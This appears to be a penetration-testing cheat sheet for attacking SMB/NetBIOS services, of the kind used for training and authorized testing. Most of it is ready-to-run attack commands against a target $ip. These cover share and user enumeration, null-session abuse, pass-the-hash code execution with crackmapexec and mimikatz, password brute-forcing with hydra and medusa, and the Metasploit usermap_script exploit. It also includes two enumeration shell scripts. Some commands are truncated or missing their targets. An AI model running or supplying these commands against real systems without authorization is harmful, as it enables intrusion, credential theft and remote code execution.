Scanning for the NetBIOS Service

nmap -p 139,445 --open -oG smb.txt
nbtscan -r


Enumerate Hostname

$ nmblookup -A $ip

List Shares

smbmap -H $ip
echo exit | smbclient -L \\\\$ip
nmap --script smb-enum-shares -p 139,445 $ip

Check Null Sessions

smbmap -H $ip
rpcclient -U "" -N $ip
smbclient \\\\$ip\\[share name]
smbclient -L // --option='client min protocol=NT1'

# if getting error "protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED"

Check for Vulnerabilities

nmap --script smb-vuln* -p 139,445 $ip

Overall Scan

enum4linux -a $ip
enum4linux -u 'guest' -p '' -a $ip

Manual Inspection $ip (port)

List smb nmap scripts

locate .nse | grep smb

Google to see if version is vulnerable

SAMBA 3.x-4.x #  vulnerable to linux/samba/is_known_pipename
SAMBA 3.5.11 # vulnerable to linux/samba/is_known_pipename

Nmap Script

Quick enum

nmap --script=smb-enum* --script-args=unsafe=1 -T5 $ip

Quick vuln scan

nmap --script=smb-vuln* --script-args=unsafe=1 -T5 $ip

Full enum and vuln scanning

nmap --script=smb2-capabilities,smb-print-text,smb2-security-mode.nse,smb-protocols,smb2-time.nse,smb-psexec,smb2-vuln-uptime,smb-security-mode,smb-server-stats,smb-double-pulsar-backdoor,smb-system-info,smb-vuln-conficker,smb-enum-groups,smb-vuln-cve2009-3103,smb-enum-processes,smb-vuln-cve-2017-7494,smb-vuln-ms06-025,smb-enum-shares,smb-vuln-ms07-029,smb-enum-users,smb-vuln-ms08-067,smb-vuln-ms10-054,smb-ls,smb-vuln-ms10-061,smb-vuln-ms17-010,smb-os-discovery --script-args=unsafe=1 -T5 $ip
nmap -p139,445 -T4 -oN smb_vulns.txt -Pn --script 'not brute and not dos and smb-*' -vv -d $ip

Vulnerable versions

  1. Windows NT, 2000, and XP (most SMB1) - VULNERABLE: Null Sessions can be created by default

  2. Windows 2003, and XP SP2 onwards - NOT VULNERABLE: Null Sessions can't be created default

  3. Most Samba (Unix) servers

List of SMB versions and corresponding Windows versions:

  1. SMB1 – Windows 2000, XP and Windows 2003.

  2. SMB2 – Windows Vista SP1 and Windows 2008

  3. SMB2.1 – Windows 7 and Windows 2008 R2

  4. SMB3 – Windows 8 and Windows 2012.


crackmapexec -u 'guest' -p '' --shares $ip
crackmapexec -u 'guest' -p '' --rid-brute 4000 $ip
crackmapexec -u 'guest' -p '' --users $ip
crackmapexec smb -u Administrator -p P@ssw0rd
crackmapexec smb -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B
crackmapexec -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B -M mimikatz
crackmapexec -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B -x whoami $ip
crackmapexec -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B --exec-method smbexec -x whoami $ip# reliable pth code execution


Works well for listing and downloading files, and listing shares and permissions. Hashes work. Code execution don't work.

smbmap -u '' -p '' -H $ip # similar to crackmapexec --shares
smbmap -u guest -p '' -H $ip
smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip
smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip -r # list top level dir
smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip -R # list everything recursively
smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip -s wwwroot -R -A '.*' # download everything recursively in the wwwroot share to /usr/share/smbmap. great when smbclient doesnt work
smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip -x whoami # no work

Download all files

smb: \> RECURSE ON
smb: \> PROMPT OFF
smb: \> mget *

Downloads a file in quiet mode

smbmap -R $sharename -H $ip -A $fileyouwanttodownload -q

Recursively list dirs, and files

smbmap -R $sharename -H $ip

#Author: rewardone
# Requires root or enough permissions to use tcpdump
# Will listen for the first 7 packets of a null login
# and grab the SMB Version
# Will sometimes not capture or will print multiple
# lines. May need to run a second time for success.
if [ -z $1 ]; then echo "Usage: ./ RHOST {RPORT}" && exit; else rhost=$1; fi
if [ ! -z $2 ]; then rport=$2; else rport=139; fi
tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " &
echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null
sleep 0.5 && echo ""

# smbenum 0.2 - This script will enumerate SMB using every tool in the arsenal
# SECFORCE - Antonio Quina
# All credits to Bernardo Damele A. G. <> for the script


if [ $# -eq 0 ]
        echo "Usage: $0 <IP>"
        echo "eg: $0"

echo -e "\n########## Getting Netbios name ##########"
nbtscan -v -h $IP

echo -e "\n########## Checking for NULL sessions ##########"
output=`bash -c "echo 'srvinfo' | rpcclient $IP -U%"`
echo $output

echo -e "\n########## Enumerating domains ##########"
bash -c "echo 'enumdomains' | rpcclient $IP -U%"

echo -e "\n########## Enumerating password and lockout policies ##########"
polenum $IP

echo -e "\n########## Enumerating users ##########"
nmap -Pn -T4 -sS -p139,445 --script=smb-enum-users $IP
bash -c "echo 'enumdomusers' | rpcclient $IP -U%"
bash -c "echo 'enumdomusers' | rpcclient $IP -U%" | cut -d[ -f2 | cut -d] -f1 > /tmp/$IP-users.txt

echo -e "\n########## Enumerating Administrators ##########"
net rpc group members "Administrators" -I $IP -U%

echo -e "\n########## Enumerating Domain Admins ##########"
net rpc group members "Domain Admins" -I $IP -U%

echo -e "\n########## Enumerating groups ##########"
nmap -Pn -T4 -sS -p139,445 --script=smb-enum-groups $IP

echo -e "\n########## Enumerating shares ##########"
nmap -Pn -T4 -sS -p139,445 --script=smb-enum-shares $IP

echo -e "\n########## Bruteforcing all users with 'password', blank and username as password"
hydra -e ns -L /tmp/$IP-users.txt -p password $IP smb -t 1
rm /tmp/$IP-users.txt

Brute force login

medusa -h $ip -u userhere -P /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt -M smbnt
nmap -p445 --script smb-brute --script-args userdb=userfilehere,passdb=/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt $ip  -vvvv

Null Session

Null session and extract information.

nbtscan -r $ip


msfconsole; use auxiliary/scanner/smb/smb_version; set RHOSTS $ip; run


msfconsole; use exploit/multi/samba/usermap_script; set lhost 10.10.14.x; set rhost $ip; run

Eternal Blue

Vulnerable versions

Windows 7, 8, 8.1 and Windows Server 2003/2008/2012(R2)/2016

nmap -p 445 $ip --script=smb-vuln-ms17-010

Bruteforce password

hydra -l administrator -P /usr/share/wordlists/rockyou.txt -t 1 $ip smb


smbclient -L
smbclient //
smbclient \\\\\\ipc$ -U john
smbclient //$ -U john


  • Gather version numbers

  • Searchsploit

  • Default Creds

  • Creds previously gathered

  • Download the software

Last updated